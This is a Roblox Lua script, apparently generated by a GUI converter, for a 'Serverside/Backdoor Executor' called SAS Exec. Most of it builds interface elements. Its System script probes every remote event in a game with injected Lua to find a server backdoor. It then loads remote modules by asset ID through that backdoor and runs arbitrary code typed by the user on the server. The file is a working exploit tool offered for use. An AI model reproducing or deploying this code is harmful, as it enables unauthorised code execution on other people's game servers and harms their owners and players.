--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 49 | Scripts: 6 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.SAS
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["Name"] = [[SAS]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.SAS.Main
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(95, 0, 226);
G2L["2"]["Size"] = UDim2.new(0.5548, 0, 0.56944, 0);
G2L["2"]["Position"] = UDim2.new(0.13474, 0, 0.26563, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Name"] = [[Main]];


-- StarterGui.SAS.Main.UICorner
G2L["3"] = Instance.new("UICorner", G2L["2"]);
G2L["3"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.SAS.Main.UIStroke
G2L["4"] = Instance.new("UIStroke", G2L["2"]);
G2L["4"]["Thickness"] = 3.1;
G2L["4"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.SAS.Main.Title
G2L["5"] = Instance.new("TextLabel", G2L["2"]);
G2L["5"]["TextWrapped"] = true;
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["TextSize"] = 14;
G2L["5"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5"]["TextScaled"] = true;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["FontFace"] = Font.new([[rbxasset://fonts/families/FredokaOne.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5"]["TextColor3"] = Color3.fromRGB(0, 209, 0);
G2L["5"]["BackgroundTransparency"] = 1;
G2L["5"]["Size"] = UDim2.new(0.4102, 0, 0.10366, 0);
G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Text"] = [[SAS Exec]];
G2L["5"]["Name"] = [[Title]];


-- StarterGui.SAS.Main.Intro
G2L["6"] = Instance.new("Frame", G2L["2"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["Size"] = UDim2.new(1, 0, 0.81098, 0);
G2L["6"]["Position"] = UDim2.new(0, 0, 0.18902, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Name"] = [[Intro]];
G2L["6"]["BackgroundTransparency"] = 1;


-- StarterGui.SAS.Main.Intro.TextLabel
G2L["7"] = Instance.new("TextLabel", G2L["6"]);
G2L["7"]["TextWrapped"] = true;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextScaled"] = true;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(0.47551, 0, 0.18797, 0);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[Welcome Player]];
G2L["7"]["Position"] = UDim2.new(0, 0, 0, 0);


-- StarterGui.SAS.Main.Intro.TextLabel.LocalScript
G2L["8"] = Instance.new("LocalScript", G2L["7"]);



-- StarterGui.SAS.Main.Intro.TextLabel
G2L["9"] = Instance.new("TextLabel", G2L["6"]);
G2L["9"]["TextWrapped"] = true;
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["TextSize"] = 20;
G2L["9"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["9"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["9"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["BackgroundTransparency"] = 1;
G2L["9"]["Size"] = UDim2.new(0.99796, 0, 0.55263, 0);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Text"] = [[Thanks for using SAS. what is SAS? SAS is Secret Administration Service (Not Secret tho) and SAS is a Serverside/Backdoor Executor.]];
G2L["9"]["Position"] = UDim2.new(0, 0, 0.44737, 0);


-- StarterGui.SAS.Main.Executor
G2L["a"] = Instance.new("Frame", G2L["2"]);
G2L["a"]["Visible"] = false;
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Size"] = UDim2.new(1, 0, 0.81098, 0);
G2L["a"]["Position"] = UDim2.new(0, 0, 0.18902, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Name"] = [[Executor]];
G2L["a"]["BackgroundTransparency"] = 1;


-- StarterGui.SAS.Main.Executor.Exe
G2L["b"] = Instance.new("TextButton", G2L["a"]);
G2L["b"]["TextWrapped"] = true;
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["TextSize"] = 14;
G2L["b"]["TextScaled"] = true;
G2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b"]["Size"] = UDim2.new(0.25306, 0, 0.18797, 0);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Text"] = [[Execute]];
G2L["b"]["Name"] = [[Exe]];
G2L["b"]["Position"] = UDim2.new(0.01633, 0, 0.71053, 0);


-- StarterGui.SAS.Main.Executor.Exe.UICorner
G2L["c"] = Instance.new("UICorner", G2L["b"]);
G2L["c"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.SAS.Main.Executor.Exe.UIStroke
G2L["d"] = Instance.new("UIStroke", G2L["b"]);
G2L["d"]["Thickness"] = 3.1;
G2L["d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.SAS.Main.Executor.Clear
G2L["e"] = Instance.new("TextButton", G2L["a"]);
G2L["e"]["TextWrapped"] = true;
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 14;
G2L["e"]["TextScaled"] = true;
G2L["e"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["Size"] = UDim2.new(0.25306, 0, 0.18797, 0);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[Clear]];
G2L["e"]["Name"] = [[Clear]];
G2L["e"]["Position"] = UDim2.new(0.29592, 0, 0.71053, 0);


-- StarterGui.SAS.Main.Executor.Clear.UICorner
G2L["f"] = Instance.new("UICorner", G2L["e"]);
G2L["f"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.SAS.Main.Executor.Clear.UIStroke
G2L["10"] = Instance.new("UIStroke", G2L["e"]);
G2L["10"]["Thickness"] = 3.1;
G2L["10"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.SAS.Main.Executor.RE
G2L["11"] = Instance.new("TextButton", G2L["a"]);
G2L["11"]["TextWrapped"] = true;
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["TextSize"] = 14;
G2L["11"]["TextScaled"] = true;
G2L["11"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["Size"] = UDim2.new(0.10612, 0, 0.18797, 0);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[RE]];
G2L["11"]["Name"] = [[RE]];
G2L["11"]["Position"] = UDim2.new(0.87551, 0, 0.71053, 0);


-- StarterGui.SAS.Main.Executor.RE.UICorner
G2L["12"] = Instance.new("UICorner", G2L["11"]);
G2L["12"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.SAS.Main.Executor.RE.UIStroke
G2L["13"] = Instance.new("UIStroke", G2L["11"]);
G2L["13"]["Thickness"] = 3.1;
G2L["13"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.SAS.Main.Executor.R6
G2L["14"] = Instance.new("TextButton", G2L["a"]);
G2L["14"]["TextWrapped"] = true;
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 14;
G2L["14"]["TextScaled"] = true;
G2L["14"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["Size"] = UDim2.new(0.10612, 0, 0.18797, 0);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[R6]];
G2L["14"]["Name"] = [[R6]];
G2L["14"]["Position"] = UDim2.new(0.74082, 0, 0.71053, 0);


-- StarterGui.SAS.Main.Executor.R6.UICorner
G2L["15"] = Instance.new("UICorner", G2L["14"]);
G2L["15"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.SAS.Main.Executor.R6.UIStroke
G2L["16"] = Instance.new("UIStroke", G2L["14"]);
G2L["16"]["Thickness"] = 3.1;
G2L["16"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.SAS.Main.Executor.Inject
G2L["17"] = Instance.new("TextButton", G2L["a"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["Size"] = UDim2.new(0.10612, 0, 0.12782, 0);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Inject]];
G2L["17"]["Name"] = [[Inject]];
G2L["17"]["Position"] = UDim2.new(0.60204, 0, 0.77068, 0);


-- StarterGui.SAS.Main.Executor.Inject.UICorner
G2L["18"] = Instance.new("UICorner", G2L["17"]);
G2L["18"]["CornerRadius"] = UDim.new(0, 10);


-- StarterGui.SAS.Main.Executor.Inject.UIStroke
G2L["19"] = Instance.new("UIStroke", G2L["17"]);
G2L["19"]["Thickness"] = 3.1;
G2L["19"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.SAS.Main.Executor.textboxback
G2L["1a"] = Instance.new("ScrollingFrame", G2L["a"]);
G2L["1a"]["Active"] = true;
G2L["1a"]["ZIndex"] = 2;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
-- [ERROR] cannot convert TopImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["1a"]["TopImage"] = [[]];
G2L["1a"]["Name"] = [[textboxback]];
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert BottomImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["1a"]["BottomImage"] = [[]];
G2L["1a"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["1a"]["Size"] = UDim2.new(0.96546, 0, 0.57616, 0);
G2L["1a"]["ScrollBarImageColor3"] = Color3.fromRGB(188, 188, 188);
G2L["1a"]["Position"] = UDim2.new(0.01618, 0, 0.03188, 0);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["BackgroundTransparency"] = 1;


-- StarterGui.SAS.Main.Executor.textboxback.UIStroke
G2L["1b"] = Instance.new("UIStroke", G2L["1a"]);
G2L["1b"]["Color"] = Color3.fromRGB(219, 219, 219);


-- StarterGui.SAS.Main.Executor.textboxback.textbox
G2L["1c"] = Instance.new("TextBox", G2L["1a"]);
G2L["1c"]["CursorPosition"] = -1;
G2L["1c"]["Name"] = [[textbox]];
G2L["1c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["1c"]["BorderSizePixel"] = 2;
G2L["1c"]["TextSize"] = 16;
G2L["1c"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["AutomaticSize"] = Enum.AutomaticSize.Y;
G2L["1c"]["ClearTextOnFocus"] = false;
G2L["1c"]["ClipsDescendants"] = true;
G2L["1c"]["PlaceholderText"] = [[-- Input]];
G2L["1c"]["Size"] = UDim2.new(0, 473, 0, 153);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[]];


-- StarterGui.SAS.Main.Executor.textboxback.textbox.LocalScript
G2L["1d"] = Instance.new("LocalScript", G2L["1c"]);



-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE
G2L["1e"] = Instance.new("LocalScript", G2L["1c"]);
G2L["1e"]["Name"] = [[RIPPLE]];


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.UseParentColor
G2L["1f"] = Instance.new("BoolValue", G2L["1e"]);
G2L["1f"]["Name"] = [[UseParentColor]];


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.DropShadow3
G2L["20"] = Instance.new("Frame", G2L["1e"]);
G2L["20"]["Visible"] = false;
G2L["20"]["ZIndex"] = -1;
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["Style"] = Enum.FrameStyle.DropShadow;
G2L["20"]["Size"] = UDim2.new(1, 10, 1, 10);
G2L["20"]["Position"] = UDim2.new(0, -5, 0, -5);
G2L["20"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["20"]["Name"] = [[DropShadow3]];


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.animated_Rounded
G2L["21"] = Instance.new("ImageLabel", G2L["1e"]);
G2L["21"]["ZIndex"] = 3;
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["ImageTransparency"] = 0.7;
G2L["21"]["ImageColor3"] = Color3.fromRGB(80, 80, 80);
G2L["21"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["21"]["Image"] = [[rbxassetid://1217158727]];
G2L["21"]["Size"] = UDim2.new(1, 0, 1, 0);
G2L["21"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["21"]["BackgroundTransparency"] = 1;
G2L["21"]["Name"] = [[animated_Rounded]];
G2L["21"]["Position"] = UDim2.new(-0.5, 0, -0.5, 0);


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.Transparency
G2L["22"] = Instance.new("BoolValue", G2L["1e"]);
G2L["22"]["Name"] = [[Transparency]];
G2L["22"]["Value"] = true;


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.shadow
G2L["23"] = Instance.new("ImageLabel", G2L["1e"]);
G2L["23"]["SliceCenter"] = Rect.new(500, 500, 500, 500);
G2L["23"]["ScaleType"] = Enum.ScaleType.Slice;
G2L["23"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["23"]["ImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["AnchorPoint"] = Vector2.new(0.5, 0);
G2L["23"]["Image"] = [[rbxassetid://1542279314]];
G2L["23"]["Size"] = UDim2.new(1, 10, 1, 11);
G2L["23"]["Visible"] = false;
G2L["23"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["23"]["BackgroundTransparency"] = 1;
G2L["23"]["Name"] = [[shadow]];
G2L["23"]["Position"] = UDim2.new(0.5, 0, 0, -4);


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.animated_Color
G2L["24"] = Instance.new("Color3Value", G2L["1e"]);
G2L["24"]["Name"] = [[animated_Color]];
G2L["24"]["Value"] = Color3.fromRGB(255, 255, 255);


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.Ripplename
G2L["25"] = Instance.new("StringValue", G2L["1e"]);
G2L["25"]["Name"] = [[Ripplename]];


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.RippleContainer
G2L["26"] = Instance.new("Frame", G2L["1e"]);
G2L["26"]["ZIndex"] = 3;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["26"]["ClipsDescendants"] = true;
G2L["26"]["Size"] = UDim2.new(1, 0, 1, 0);
G2L["26"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
G2L["26"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["26"]["Name"] = [[RippleContainer]];
G2L["26"]["BackgroundTransparency"] = 1;


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.RippleContainer.ImageLabel
G2L["27"] = Instance.new("ImageLabel", G2L["26"]);
G2L["27"]["ImageTransparency"] = 0.035;
G2L["27"]["Size"] = UDim2.new(1, 0, 1, 0);
G2L["27"]["ClipsDescendants"] = true;
G2L["27"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["27"]["BackgroundTransparency"] = 1;


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.Tooltip
G2L["28"] = Instance.new("StringValue", G2L["1e"]);
G2L["28"]["Name"] = [[Tooltip]];


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.TooltipFrame
G2L["29"] = Instance.new("ImageLabel", G2L["1e"]);
G2L["29"]["ZIndex"] = 2;
G2L["29"]["SliceCenter"] = Rect.new(4, 4, 252, 252);
G2L["29"]["ScaleType"] = Enum.ScaleType.Slice;
G2L["29"]["ImageTransparency"] = 1;
G2L["29"]["ImageColor3"] = Color3.fromRGB(98, 98, 98);
G2L["29"]["AnchorPoint"] = Vector2.new(0.5, 0);
G2L["29"]["Image"] = [[rbxassetid://1934624205]];
G2L["29"]["Size"] = UDim2.new(0, 20, 0, 20);
G2L["29"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["29"]["BackgroundTransparency"] = 1;
G2L["29"]["Name"] = [[TooltipFrame]];
G2L["29"]["Position"] = UDim2.new(0.5, 0, 1, 8);


-- StarterGui.SAS.Main.Executor.textboxback.textbox.RIPPLE.TooltipFrame.TextLabel
G2L["2a"] = Instance.new("TextLabel", G2L["29"]);
G2L["2a"]["ZIndex"] = 3;
G2L["2a"]["TextSize"] = 12;
G2L["2a"]["TextTransparency"] = 1;
G2L["2a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
G2L["2a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2a"]["BackgroundTransparency"] = 1;
G2L["2a"]["Size"] = UDim2.new(1, 0, 1, 0);
G2L["2a"]["BorderColor3"] = Color3.fromRGB(28, 43, 54);
G2L["2a"]["Text"] = [[]];


-- StarterGui.SAS.Main.Executor.System
G2L["2b"] = Instance.new("LocalScript", G2L["a"]);
G2L["2b"]["Name"] = [[System]];


-- StarterGui.SAS.Main.Executor.System.Click
G2L["2c"] = Instance.new("Sound", G2L["2b"]);
G2L["2c"]["RollOffMode"] = Enum.RollOffMode.InverseTapered;
G2L["2c"]["Name"] = [[Click]];
-- [ERROR] cannot convert AudioContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["2c"]["SoundId"] = [[rbxassetid://72750814778881]];


-- StarterGui.SAS.Main.Dragify
G2L["2d"] = Instance.new("LocalScript", G2L["2"]);
G2L["2d"]["Name"] = [[Dragify]];


-- StarterGui.SAS.Main.intr
G2L["2e"] = Instance.new("TextButton", G2L["2"]);
G2L["2e"]["TextWrapped"] = true;
G2L["2e"]["BorderSizePixel"] = 0;
G2L["2e"]["TextSize"] = 14;
G2L["2e"]["TextScaled"] = true;
G2L["2e"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2e"]["BackgroundColor3"] = Color3.fromRGB(255, 0, 5);
G2L["2e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2e"]["Size"] = UDim2.new(0.18163, 0, 0.08537, 0);
G2L["2e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2e"]["Text"] = [[Introduction]];
G2L["2e"]["Name"] = [[intr]];
G2L["2e"]["Position"] = UDim2.new(0, 0, 0.10366, 0);


-- StarterGui.SAS.Main.exec
G2L["2f"] = Instance.new("TextButton", G2L["2"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(255, 0, 5);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["Size"] = UDim2.new(0.18163, 0, 0.08537, 0);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[Executor]];
G2L["2f"]["Name"] = [[exec]];
G2L["2f"]["Position"] = UDim2.new(0.20612, 0, 0.10366, 0);


-- StarterGui.SAS.Main.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2"]);



-- StarterGui.SAS.Main.UIAspectRatioConstraint
G2L["31"] = Instance.new("UIAspectRatioConstraint", G2L["2"]);
G2L["31"]["AspectRatio"] = 1.4939;


-- StarterGui.SAS.Main.Intro.TextLabel.LocalScript
local function C_8()
local script = G2L["8"];
	script.Parent.Text = "Welcome ".. game.Players.LocalPlayer.Name
end;
task.spawn(C_8);
-- StarterGui.SAS.Main.Executor.textboxback.textbox.LocalScript
local function C_1d()
local script = G2L["1d"];
	local TextBox = script.Parent
	local UIS = game:GetService("UserInputService")
	
	TextBox.MultiLine = true
	TextBox.ClearTextOnFocus = false
	
	UIS.InputBegan:Connect(function(input, gp)
		if gp then return end
		if input.KeyCode == Enum.KeyCode.Return then
			if TextBox:IsFocused() then
				local text = TextBox.Text
				local pos = TextBox.CursorPosition
	
				if pos > 0 then
					TextBox.Text =
						string.sub(text, 1, pos - 1)
						.. "\n"
						.. string.sub(text, pos)
					TextBox.CursorPosition = pos + 1
				end
			end
		end
	end)
	
end;
task.spawn(C_1d);
-- StarterGui.SAS.Main.Executor.System
local function C_2b()
local script = G2L["2b"];
	local StarterGui = game:GetService("StarterGui");
	local e = script.Parent;
	local plr = game.Players.LocalPlayer;
	local input = e.textboxback.textbox;
	local exe = e.Exe;
	local clear = e.Clear;
	local inject = e.Inject;
	local re = e.RE;
	local rr = e.R6;
	local sound = script.Click;
	local Logs = "print('Hello')"
	alphabet={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'}
	
	backdoor=nil
	HttpService=game:GetService("HttpService")
	
	function debug(text, lvl)
		local func=print
		if lvl==1 then func=print end
		if lvl==2 then func=error end
		if lvl==3 then func=warn end
		func(text)
	end
	
	function runRemote(remote, data, data2)
		if remote:IsA('RemoteEvent') then
			remote:FireServer(data)
		elseif remote:IsA('RemoteFunction') then
			spawn(function() remote:InvokeServer(data) end)
		end
	
	end
	
	
	function notify(text)
		game:GetService('StarterGui'):SetCore(
			"SendNotification",
			{
				Title = "SAS",
				Duration = 6,
				Text = text
			}
		)
	end
	
	
	if _G.LALOL_Hub_Backdoor_Logs_Disabled then
		notify('Logs disabled :(')
	end
	
	
	function generateName(lenght)
	
		local text=''
	
		for i=1,lenght do
			text=text..alphabet[math.random(1,#alphabet)]
		end
	
		return text
	
	end
	
	local code
	function findRemote()
	
		local timee=os.clock()
	
		local remotes={}
	
		for i,remote in game:GetDescendants() do
	
	
			if not remote:IsA('RemoteEvent') then 
				if not remote:IsA('RemoteFunction') then continue end
			end
	
			-- RobloxReplicatedStorage
			if string.split(remote:GetFullName(), '.')[1]=='RobloxReplicatedStorage' then
				debug('Roblox Replicated Storage ('..remote.Name..')', 1)
				continue
			end
	
			-- Backdoor Sender
	
			while true do
				code=generateName(math.random(12,30))
				if not remotes[code] then break end
			end
	
			runRemote(remote, "a=Instance.new('Model',workspace)a.Name='"..code.."'")
			remotes[code]=remote
	
		end
	
		-- Backdoor Checker
	
		for i=1,100 do
	
			for i,remote in remotes do
				local code=i
	
				if workspace:FindFirstChild(code) then
	
					notify('Backdoor found! '..os.clock()-timee..'s')
	
					backdoor=remote
	
					runRemote(backdoor, "require(80690314644985).RE('" ..plr.Name.. "')")
					runRemote(backdoor, Logs)
	
					return true
				end
			end
			wait()
		end
	
		return false
	
	end
	
	
	inject.MouseButton1Click:Connect(function()
		findRemote()
		sound:Play()
	end)
	
	exe.MouseButton1Click:Connect(function()
		runRemote(backdoor, input.Text)
		sound:Play()
	end)
	
	clear.MouseButton1Click:Connect(function()
		input.Text = ""
		sound:Play()
	end)
	
	re.MouseButton1Click:Connect(function()
		game.ReplicatedStorage:WaitForChild("RE"):FireServer()
		sound:Play()
	end)
	
	rr.MouseButton1Click:Connect(function()
		local Re6 = "require(3436957371):r6('".. plr.Name .. "')"
		runRemote(backdoor, Re6)
		sound:Play()
	end)
end;
task.spawn(C_2b);
-- StarterGui.SAS.Main.Dragify
local function C_2d()
local script = G2L["2d"];
	local UIS = game:GetService("UserInputService")
	local frame = script.Parent
	
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragStart = nil
	local startPos = nil
	
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale,startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService("TweenService"):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end;
task.spawn(C_2d);
-- StarterGui.SAS.Main.LocalScript
local function C_30()
local script = G2L["30"];
	local intr = script.Parent.intr
	local intro = script.Parent.Intro
	local exec = script.Parent.exec
	local executor = script.Parent.Executor
	
	intr.MouseButton1Click:Connect(function()
		intro.Visible = true
		executor.Visible = false
	end)
	
	exec.MouseButton1Click:Connect(function()
		intro.Visible = false
		executor.Visible = true
	end)
end;
task.spawn(C_30);

return G2L["1"], require;
